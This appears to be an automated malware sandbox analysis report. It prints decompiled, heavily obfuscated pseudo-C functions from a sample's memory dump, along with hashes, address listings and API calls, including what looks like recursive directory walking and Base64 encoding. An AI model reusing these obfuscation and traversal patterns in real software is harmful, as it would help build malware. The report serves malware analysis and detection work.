                                                      • String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
                                                      • API String ID: 0-3778435269
                                                      • Opcode ID: f9fe4e7595adbafd0c415ec7addbff66a690945b58ca593ded39d2991255ef24
                                                      • Instruction ID: 472d332c45b494aa0fd804a7faceb257eaac6d3870ed1fc731aba12a1452282e
                                                      • Opcode Fuzzy Hash: f9fe4e7595adbafd0c415ec7addbff66a690945b58ca593ded39d2991255ef24
                                                      • Instruction Fuzzy Hash: 5ED102B15083819FE368CF65C889A1FFBE1BBC4758F10891DF29A96260D7B58949CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00248F49, Relevance: 12.7, Strings: 10, Instructions: 223COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E00248F49() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t264;
				intOrPtr _t282;
				void* _t286;
				signed int* _t290;

				_t290 =  &_v1144;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x4ebe6;
				_v1128 = 0x778f;
				_v1128 = _v1128 | 0xa1323825;
				_t249 = 0x13;
				_v1128 = _v1128 / _t249;
				_v1128 = _v1128 << 2;
				_t286 = 0x35c963e4;
				_v1128 = _v1128 ^ 0x21ef9208;
				_v1052 = 0x4cd;
				_v1052 = _v1052 | 0x68cff677;
				_v1052 = _v1052 ^ 0x68cf93fd;
				_v1092 = 0x77ae;
				_v1092 = _v1092 >> 0xa;
				_v1092 = _v1092 ^ 0x00005fc7;
				_v1060 = 0x2f45;
				_v1060 = _v1060 | 0xa1a9613d;
				_v1060 = _v1060 ^ 0xa1a96f30;
				_v1096 = 0x6d0d;
				_v1096 = _v1096 << 2;
				_v1096 = _v1096 | 0xf85e23e8;
				_v1096 = _v1096 ^ 0xf85f94d5;
				_v1136 = 0xe906;
				_t250 = 0x4b;
				_v1136 = _v1136 * 0x76;
				_v1136 = _v1136 + 0x8e3a;
				_v1136 = _v1136 << 8;
				_v1136 = _v1136 ^ 0x6bf6f1e6;
				_v1104 = 0x5e2e;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 * 0x2c;
				_v1104 = _v1104 ^ 0x0000496b;
				_v1144 = 0xf2e9;
				_v1144 = _v1144 + 0xd50c;
				_v1144 = _v1144 / _t250;
				_v1144 = _v1144 ^ 0x9fddb036;
				_v1144 = _v1144 ^ 0x9fdde12f;
				_v1108 = 0x6902;
				_v1108 = _v1108 | 0xfbe10d26;
				_v1108 = _v1108 * 0x44;
				_v1108 = _v1108 ^ 0xe7e09cc2;
				_v1120 = 0xf3f1;
				_v1120 = _v1120 + 0xffff8a4f;
				_v1120 = _v1120 >> 6;
				_v1120 = _v1120 * 0x67;
				_v1120 = _v1120 ^ 0x0000b01d;
				_v1088 = 0xb368;
				_v1088 = _v1088 + 0x9734;
				_v1088 = _v1088 ^ 0x00010c20;
				_v1076 = 0x650d;
				_v1076 = _v1076 ^ 0x0544b8d8;
				_v1076 = _v1076 ^ 0x054483f2;
				_v1056 = 0xabff;
				_v1056 = _v1056 ^ 0x935518d0;
				_v1056 = _v1056 ^ 0x9355abf6;
				_v1068 = 0xb772;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00028ed1;
				_v1124 = 0xbc7e;
				_v1124 = _v1124 * 0x39;
				_v1124 = _v1124 + 0x3dff;
				_v1124 = _v1124 ^ 0x966a7207;
				_v1124 = _v1124 ^ 0x9640526c;
				_v1132 = 0xba5f;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 << 5;
				_t251 = 0x75;
				_v1132 = _v1132 / _t251;
				_v1132 = _v1132 ^ 0x0197c6fa;
				_v1140 = 0x5fea;
				_t252 = 0x3c;
				_v1140 = _v1140 * 0xa;
				_v1140 = _v1140 * 0x2d;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x002a725f;
				_v1100 = 0x79ec;
				_v1100 = _v1100 << 8;
				_v1100 = _v1100 ^ 0x69f808d7;
				_v1100 = _v1100 ^ 0x69818172;
				_v1084 = 0xd5eb;
				_v1084 = _v1084 ^ 0xb139babe;
				_v1084 = _v1084 ^ 0xb1392951;
				_v1072 = 0x4dbe;
				_v1072 = _v1072 ^ 0x00003bef;
				_v1080 = 0x7ef4;
				_v1080 = _v1080 / _t252;
				_v1080 = _v1080 ^ 0x00000c75;
				_v1112 = 0xcb8d;
				_v1112 = _v1112 + 0x5361;
				_v1112 = _v1112 + 0xffffff0c;
				_v1112 = _v1112 ^ 0x00015b8c;
				_v1064 = 0xba20;
				_v1064 = _v1064 ^ 0x3b22f3f3;
				_v1064 = _v1064 ^ 0x3b2222af;
				_v1116 = 0xa287;
				_v1116 = _v1116 + 0x9065;
				_t253 = 0x5f;
				_v1116 = _v1116 / _t253;
				_v1116 = _v1116 + 0xffff8b94;
				_v1116 = _v1116 ^ 0xffffc056;
				_t238 = E002485BA(_t253);
				do {
					while(_t286 != 0x2b67e243) {
						if(_t286 == 0x35036a43) {
							_push( &_v1040);
							_push( &_v520);
							return E00237B63(_v1064, _v1116, __eflags);
						}
						if(_t286 == 0x35c963e4) {
							_t286 = 0x39b3b44d;
							continue;
						}
						_t295 = _t286 - 0x39b3b44d;
						if(_t286 != 0x39b3b44d) {
							goto L8;
						}
						_push(_v1092);
						_t245 = E0024889D(0x24c9b0, _v1052, _t295);
						_pop(_t264);
						_t282 =  *0x24ca2c; // 0x698300
						_t196 = _t282 + 0x230; // 0x7a0043
						E0023C680(_t196, _v1096, _v1136, _t264, _v1104,  *0x24ca2c, _t245,  &_v520);
						_t238 = E00242025(_v1144, _t245, _v1108, _v1120);
						_t290 =  &(_t290[9]);
						_t286 = 0x2b67e243;
					}
					_push(_v1076);
					_t239 = E0024889D(0x24c980, _v1088, __eflags);
					_t240 = E00248C8F(_v1056);
					_t258 =  *0x24ca2c; // 0x698300
					_t210 = _t258 + 0x230; // 0x698530
					E002329E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
					_t238 = E00242025(_v1072, _t239, _v1080, _v1112);
					_t290 =  &(_t290[0xc]);
					_t286 = 0x35036a43;
					L8:
					__eflags = _t286 - 0x38d0088b;
				} while (__eflags != 0);
				return _t238;
			}













































                                                      0x00248f49
                                                      0x00248f4f
                                                      0x00248f56
                                                      0x00248f5e
                                                      0x00248f66
                                                      0x00248f78
                                                      0x00248f7d
                                                      0x00248f83
                                                      0x00248f88
                                                      0x00248f8d
                                                      0x00248f95
                                                      0x00248f9d
                                                      0x00248fa5
                                                      0x00248fad
                                                      0x00248fb5
                                                      0x00248fc2
                                                      0x00248fca
                                                      0x00248fd2
                                                      0x00248fda
                                                      0x00248fe2
                                                      0x00248fea
                                                      0x00248fef
                                                      0x00248ff7
                                                      0x00248fff
                                                      0x0024900c
                                                      0x0024900d
                                                      0x00249011
                                                      0x00249019
                                                      0x0024901e
                                                      0x00249026
                                                      0x0024902e
                                                      0x00249038
                                                      0x0024903c
                                                      0x00249044
                                                      0x0024904c
                                                      0x0024905a
                                                      0x0024905e
                                                      0x00249066
                                                      0x0024906e
                                                      0x00249076
                                                      0x00249083
                                                      0x00249087
                                                      0x0024908f
                                                      0x00249097
                                                      0x0024909f
                                                      0x002490a9
                                                      0x002490ad
                                                      0x002490b5
                                                      0x002490bd
                                                      0x002490c5
                                                      0x002490cd
                                                      0x002490d5
                                                      0x002490dd
                                                      0x002490e5
                                                      0x002490ed
                                                      0x002490f5
                                                      0x002490fd
                                                      0x00249105
                                                      0x0024910a
                                                      0x00249112
                                                      0x0024911f
                                                      0x00249123
                                                      0x0024912b
                                                      0x00249133
                                                      0x0024913d
                                                      0x00249145
                                                      0x0024914a
                                                      0x00249155
                                                      0x0024915a
                                                      0x00249160
                                                      0x00249168
                                                      0x00249175
                                                      0x00249178
                                                      0x00249181
                                                      0x00249185
                                                      0x0024918a
                                                      0x00249192
                                                      0x0024919a
                                                      0x0024919f
                                                      0x002491a7
                                                      0x002491af
                                                      0x002491b7
                                                      0x002491bf
                                                      0x002491c7
                                                      0x002491d7
                                                      0x002491df
                                                      0x002491ef
                                                      0x002491f3
                                                      0x002491fb
                                                      0x00249203
                                                      0x0024920b
                                                      0x00249213
                                                      0x0024921b
                                                      0x00249223
                                                      0x0024922b
                                                      0x00249233
                                                      0x0024923b
                                                      0x00249247
                                                      0x0024924a
                                                      0x0024924e
                                                      0x00249256
                                                      0x00249262
                                                      0x00249276
                                                      0x00249276
                                                      0x00249280
                                                      0x0024938d
                                                      0x00249395
                                                      0x00000000
                                                      0x0024939c
                                                      0x0024928c
                                                      0x002492fc
                                                      0x00000000
                                                      0x002492fc
                                                      0x0024928e
                                                      0x00249290
                                                      0x00000000
                                                      0x00000000
                                                      0x00249296
                                                      0x002492a3
                                                      0x002492a8
                                                      0x002492c7
                                                      0x002492d4
                                                      0x002492da
                                                      0x002492ed
                                                      0x002492f2
                                                      0x002492f5
                                                      0x002492f5
                                                      0x00249303
                                                      0x00249310
                                                      0x0024931f
                                                      0x00249341
                                                      0x0024934d
                                                      0x00249353
                                                      0x00249369
                                                      0x0024936e
                                                      0x00249371
                                                      0x00249373
                                                      0x00249373
                                                      0x00249373
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
                                                      • API String ID: 0-1402005448
                                                      • Opcode ID: 95cd7e87395356083014d7be14ec61461bbcc7f0e5331402cc79b4c18f156fa1
                                                      • Instruction ID: e1ba25ea2e503b2212303459b9f38eeba743199c744c360f19c4bff692906f9e
                                                      • Opcode Fuzzy Hash: 95cd7e87395356083014d7be14ec61461bbcc7f0e5331402cc79b4c18f156fa1
                                                      • Instruction Fuzzy Hash: CAB1327151D3819FD358CF24C58A40BFBE1FBC8798F208A1DF595862A0D7B98A58CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00241773, Relevance: 12.6, Strings: 10, Instructions: 147COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E00241773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t131;
				void* _t148;
				void* _t151;
				signed int _t162;
				void* _t164;
				signed int* _t167;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0023602B(_t131);
				_v32 = 0x943f;
				_t167 =  &(( &_v64)[6]);
				_t164 = 0;
				_t151 = 0x349de80e;
				_t162 = 0x48;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x003ccdd6;
				_v56 = 0x5d22;
				_v56 = _v56 << 0xb;
				_v56 = _v56 * 0x6c;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 ^ 0x0003a52d;
				_v48 = 0xb9ad;
				_v48 = _v48 / _t162;
				_v48 = _v48 | 0x8e45101b;
				_v48 = _v48 ^ 0xce45129f;
				_v16 = 0x4535;
				_v16 = _v16 + 0xffff440f;
				_v16 = _v16 ^ 0xbfff8944;
				_v24 = 0xd710;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x000d4c75;
				_v44 = 0x65fd;
				_v44 = _v44 >> 2;
				_v44 = _v44 | 0x32207922;
				_v44 = _v44 ^ 0x322078de;
				_v28 = 0xded8;
				_v28 = _v28 ^ 0x86a01735;
				_v28 = _v28 ^ 0x86a0c6d1;
				_v64 = 0xdb93;
				_v64 = _v64 + 0x597e;
				_v64 = _v64 << 0xa;
				_v64 = _v64 << 0xa;
				_v64 = _v64 ^ 0x5110354e;
				_v60 = 0x2ada;
				_v60 = _v60 | 0x1c3e2a8f;
				_v60 = _v60 + 0xf49a;
				_v60 = _v60 ^ 0xe6209c52;
				_v60 = _v60 ^ 0xfa1f8dfc;
				_v20 = 0xdaa6;
				_v20 = _v20 + 0xb461;
				_v20 = _v20 ^ 0x0001dcca;
				_v40 = 0x4872;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0xb451885a;
				_v40 = _v40 ^ 0xb451b970;
				_v36 = 0x262e;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 + 0x6428;
				_v36 = _v36 ^ 0x00003c11;
				_v8 = 0x6e80;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06e82b80;
				_v12 = 0x3e9d;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00005153;
				_v52 = 0x8462;
				_v52 = _v52 ^ 0xcdf70fa2;
				_v52 = _v52 ^ 0xe5a9b23c;
				_v52 = _v52 | 0x26296c1d;
				_v52 = _v52 ^ 0x2e7f2e4a;
				do {
					while(_t151 != 0x6cb1230) {
						if(_t151 == 0x944062a) {
							_push(_t151);
							_push(_t151);
							_t164 = E00238736(_v4 + _v4);
							if(_t164 != 0) {
								_t151 = 0x6cb1230;
								continue;
							}
						} else {
							if(_t151 == 0x30a4ce3e) {
								_t148 = E002477A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
								_t167 =  &(_t167[7]);
								if(_t148 != 0) {
									_t151 = 0x944062a;
									continue;
								}
							} else {
								if(_t151 != 0x349de80e) {
									goto L11;
								} else {
									_t151 = 0x30a4ce3e;
									continue;
								}
							}
						}
						goto L12;
					}
					E002477A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
					_t167 =  &(_t167[7]);
					_t151 = 0x222ae378;
					L11:
				} while (_t151 != 0x222ae378);
				L12:
				return _t164;
			}


























                                                      0x0024177a
                                                      0x0024177e
                                                      0x00241782
                                                      0x00241786
                                                      0x0024178a
                                                      0x0024178c
                                                      0x00241791
                                                      0x00241799
                                                      0x002417a3
                                                      0x002417a5
                                                      0x002417b6
                                                      0x002417b7
                                                      0x002417bb
                                                      0x002417c3
                                                      0x002417cb
                                                      0x002417d5
                                                      0x002417d9
                                                      0x002417de
                                                      0x002417e6
                                                      0x002417f9
                                                      0x002417fd
                                                      0x00241805
                                                      0x0024180d
                                                      0x00241815
                                                      0x0024181d
                                                      0x00241825
                                                      0x0024182d
                                                      0x00241832
                                                      0x0024183a
                                                      0x00241842
                                                      0x00241847
                                                      0x0024184f
                                                      0x00241857
                                                      0x0024185f
                                                      0x00241867
                                                      0x0024186f
                                                      0x00241877
                                                      0x0024187f
                                                      0x00241884
                                                      0x00241889
                                                      0x00241891
                                                      0x00241899
                                                      0x002418a1
                                                      0x002418a9
                                                      0x002418b1
                                                      0x002418b9
                                                      0x002418c1
                                                      0x002418c9
                                                      0x002418d1
                                                      0x002418d9
                                                      0x002418de
                                                      0x002418e6
                                                      0x002418ee
                                                      0x002418f6
                                                      0x002418fb
                                                      0x00241903
                                                      0x0024190b
                                                      0x00241913
                                                      0x00241918
                                                      0x00241920
                                                      0x00241928
                                                      0x0024192d
                                                      0x00241935
                                                      0x0024193d
                                                      0x00241945
                                                      0x0024194d
                                                      0x00241955
                                                      0x0024195d
                                                      0x0024195d
                                                      0x00241963
                                                      0x002419c0
                                                      0x002419c1
                                                      0x002419ca
                                                      0x002419d0
                                                      0x002419d2
                                                      0x00000000
                                                      0x002419d2
                                                      0x00241965
                                                      0x00241967
                                                      0x002419a0
                                                      0x002419a5
                                                      0x002419aa
                                                      0x002419ac
                                                      0x00000000
                                                      0x002419ac
                                                      0x00241969
                                                      0x0024196f
                                                      0x00000000
                                                      0x00241975
                                                      0x00241975
                                                      0x00000000
                                                      0x00241975
                                                      0x0024196f
                                                      0x00241967
                                                      0x00000000
                                                      0x00241963
                                                      0x002419fc
                                                      0x00241a01
                                                      0x00241a04
                                                      0x00241a09
                                                      0x00241a09
                                                      0x00241a16
                                                      0x00241a1e

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
                                                      • API String ID: 0-656425227
                                                      • Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                                      • Instruction ID: 434dcaf6484d95d6b8429c07964260ddd04c56ef0452b2183bca049d8c4d874a
                                                      • Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
                                                      • Instruction Fuzzy Hash: FF6121721093429FD358CF60C89982BFBE1BBD5788F104A1DF69696260C3B5CA58CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10002730, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63encryptionmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                                      • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                                      • CoTaskMemAlloc.OLE32(?), ref: 10002782
                                                      • CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                                      • CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                                      • CoTaskMemFree.OLE32(?), ref: 100027D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
                                                      • String ID: o
                                                      • API String ID: 207024522-3306556724
                                                      • Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                                      • Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
                                                      • Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
                                                      • Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00242B16, Relevance: 11.6, Strings: 9, Instructions: 329COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E00242B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				unsigned int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				unsigned int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* __edx;
				void* _t314;
				signed int _t340;
				signed int _t342;
				signed int _t346;
				void* _t348;
				void* _t354;
				signed int _t358;
				void* _t360;
				void* _t389;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t408;
				void* _t409;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t314);
				_v1672 = 0x92f4;
				_t409 = _t408 + 0x1c;
				_t354 = 0x3181563a;
				_t400 = 0x5d;
				_v1672 = _v1672 / _t400;
				_v1672 = _v1672 ^ 0xa72c55b3;
				_v1672 = _v1672 ^ 0xa72c5437;
				_v1736 = 0x461f;
				_v1736 = _v1736 + 0xd353;
				_v1736 = _v1736 + 0xffff7400;
				_v1736 = _v1736 + 0xffff12e8;
				_v1736 = _v1736 ^ 0xffffeb08;
				_v1684 = 0x12ca;
				_v1684 = _v1684 + 0xffffbd30;
				_v1684 = _v1684 + 0xc084;
				_v1684 = _v1684 ^ 0x00009b25;
				_v1700 = 0x68fe;
				_v1700 = _v1700 >> 0x10;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000058ac;
				_v1676 = 0xc4c1;
				_v1676 = _v1676 + 0x377e;
				_v1676 = _v1676 + 0xffff6b29;
				_v1676 = _v1676 ^ 0x0000377c;
				_v1708 = 0x7055;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0x1eb23ae3;
				_v1708 = _v1708 ^ 0x02a72f08;
				_v1648 = 0x750a;
				_v1648 = _v1648 | 0xec573941;
				_v1648 = _v1648 ^ 0xec5707ed;
				_v1744 = 0xfcbf;
				_t401 = 0x2c;
				_v1744 = _v1744 * 0x3d;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 / _t401;
				_v1744 = _v1744 ^ 0x00003058;
				_v1636 = 0x9933;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x0004b1ef;
				_v1668 = 0xb76d;
				_v1668 = _v1668 | 0xef4f757f;
				_v1668 = _v1668 ^ 0xef4ff671;
				_v1656 = 0xf145;
				_v1656 = _v1656 + 0x1194;
				_v1656 = _v1656 ^ 0x00010bb0;
				_v1752 = 0xf3e9;
				_t402 = 0x49;
				_v1752 = _v1752 / _t402;
				_v1752 = _v1752 + 0x9c03;
				_v1752 = _v1752 + 0xffffb211;
				_v1752 = _v1752 ^ 0x000027fb;
				_v1728 = 0x648a;
				_v1728 = _v1728 ^ 0x1010be16;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 | 0x258edfa9;
				_v1728 = _v1728 ^ 0x65dfe7b9;
				_v1688 = 0x4eab;
				_v1688 = _v1688 << 0xa;
				_v1688 = _v1688 | 0x3ca08384;
				_v1688 = _v1688 ^ 0x3dba9eb2;
				_v1756 = 0xd2f4;
				_t403 = 0x23;
				_v1756 = _v1756 / _t403;
				_v1756 = _v1756 ^ 0xcde225b2;
				_t404 = 0x6e;
				_v1756 = _v1756 / _t404;
				_v1756 = _v1756 ^ 0x01df76bd;
				_v1760 = 0x6cd1;
				_v1760 = _v1760 * 0x7d;
				_v1760 = _v1760 ^ 0x8e200a23;
				_v1760 = _v1760 >> 3;
				_v1760 = _v1760 ^ 0x11c2d811;
				_v1640 = 0xac3a;
				_v1640 = _v1640 >> 3;
				_v1640 = _v1640 ^ 0x00004856;
				_v1748 = 0x4fc2;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 * 0x31;
				_v1748 = _v1748 ^ 0x38a83a44;
				_v1748 = _v1748 ^ 0x38a82be9;
				_v1680 = 0xb86a;
				_v1680 = _v1680 | 0x02231922;
				_v1680 = _v1680 + 0xaf06;
				_v1680 = _v1680 ^ 0x022411a2;
				_v1644 = 0x3f39;
				_v1644 = _v1644 + 0xffff5bb9;
				_v1644 = _v1644 ^ 0xffffc632;
				_v1692 = 0xc5f9;
				_v1692 = _v1692 ^ 0xaafe79bc;
				_v1692 = _v1692 >> 0xf;
				_v1692 = _v1692 ^ 0x00013e0d;
				_v1740 = 0x58ed;
				_v1740 = _v1740 + 0xffff3fce;
				_v1740 = _v1740 * 0x34;
				_v1740 = _v1740 * 0x49;
				_v1740 = _v1740 ^ 0xfa04971a;
				_v1696 = 0xcc7a;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x00000d26;
				_v1732 = 0xc33a;
				_v1732 = _v1732 | 0xb66c57ae;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 * 0x56;
				_v1732 = _v1732 ^ 0xea449beb;
				_v1712 = 0xdae0;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0xc13d67df;
				_v1712 = _v1712 ^ 0xc13d455b;
				_v1716 = 0x5478;
				_v1716 = _v1716 | 0xa382055d;
				_v1716 = _v1716 * 0x26;
				_v1716 = _v1716 ^ 0x4558c259;
				_v1720 = 0xeafc;
				_v1720 = _v1720 + 0xffff5250;
				_v1720 = _v1720 ^ 0x4a0f2ed9;
				_v1720 = _v1720 ^ 0x4a0f1f8c;
				_v1664 = 0x8e28;
				_v1664 = _v1664 ^ 0x7b061f8d;
				_v1664 = _v1664 + 0xffffa0ec;
				_v1664 = _v1664 ^ 0x7b062de0;
				_v1724 = 0xce31;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 << 5;
				_v1724 = _v1724 ^ 0xc4004273;
				_v1704 = 0xa554;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 * 0x35;
				_v1704 = _v1704 ^ 0x04475614;
				_v1660 = 0xb9dc;
				_v1660 = _v1660 + 0x9e03;
				_v1660 = _v1660 ^ 0x00011a8b;
				_v1652 = 0xf227;
				_t399 = _v1660;
				_v1652 = _v1652 / _t404;
				_v1652 = _v1652 ^ 0x00007d1f;
				while(1) {
					L1:
					_t389 = 0x2e;
					L2:
					while(_t354 != 0x2ecc014) {
						if(_t354 == 0xf8b22d1) {
							__eflags = _v1632 & _v1672;
							if(__eflags == 0) {
								_t340 = _a8( &_v1632, _a20);
								asm("sbb ecx, ecx");
								_t358 =  ~_t340 & 0x1c386f3a;
								L13:
								_t354 = _t358 + 0x2ecc014;
								while(1) {
									L1:
									_t389 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t389;
							if(_v1588 != _t389) {
								L20:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1760);
									_t348 = E0024889D(0x24c0b0, _v1756, __eflags);
									_pop(_t360);
									E0023C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
									E00242B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
									_t409 = _t409 + 0x30;
									_t346 = E00242025(_v1732, _t348, _v1712, _v1716);
									_t389 = 0x2e;
								}
								L19:
								_t354 = 0x1f252f4e;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L19;
							}
							__eflags = _v1586 - _t389;
							if(_v1586 != _t389) {
								goto L20;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						if(_t354 == 0x1f252f4e) {
							_t342 = E0023595A(_v1720, _t399,  &_v1632, _v1664);
							asm("sbb ecx, ecx");
							_t358 =  ~_t342 & 0x0c9e62bd;
							__eflags = _t358;
							goto L13;
						}
						if(_t354 == 0x21983c19) {
							_push(_v1684);
							E00247BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E0024889D(0x24c090, _v1736, __eflags));
							_t346 = E00242025(_v1744, _t343, _v1636, _v1668);
							_t409 = _t409 + 0x20;
							_t354 = 0x3298743a;
							while(1) {
								L1:
								_t389 = 0x2e;
								goto L2;
							}
						}
						if(_t354 == 0x3181563a) {
							_t354 = 0x21983c19;
							continue;
						}
						if(_t354 != 0x3298743a) {
							L24:
							__eflags = _t354 - 0x2a8aa181;
							if(__eflags != 0) {
								continue;
							}
							L25:
							return _t346;
						}
						_t346 = E0023109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
						_t399 = _t346;
						_t409 = _t409 + 0x10;
						if(_t346 == 0xffffffff) {
							goto L25;
						}
						_t354 = 0xf8b22d1;
						goto L1;
					}
					E00231B5C(_v1724, _v1704, _v1660, _t399, _v1652);
					_t409 = _t409 + 0xc;
					_t354 = 0x2a8aa181;
					_t389 = 0x2e;
					goto L24;
				}
			}


























































                                                      0x00242b1f
                                                      0x00242b26
                                                      0x00242b2d
                                                      0x00242b34
                                                      0x00242b3b
                                                      0x00242b43
                                                      0x00242b44
                                                      0x00242b49
                                                      0x00242b54
                                                      0x00242b5d
                                                      0x00242b64
                                                      0x00242b69
                                                      0x00242b6f
                                                      0x00242b77
                                                      0x00242b7f
                                                      0x00242b87
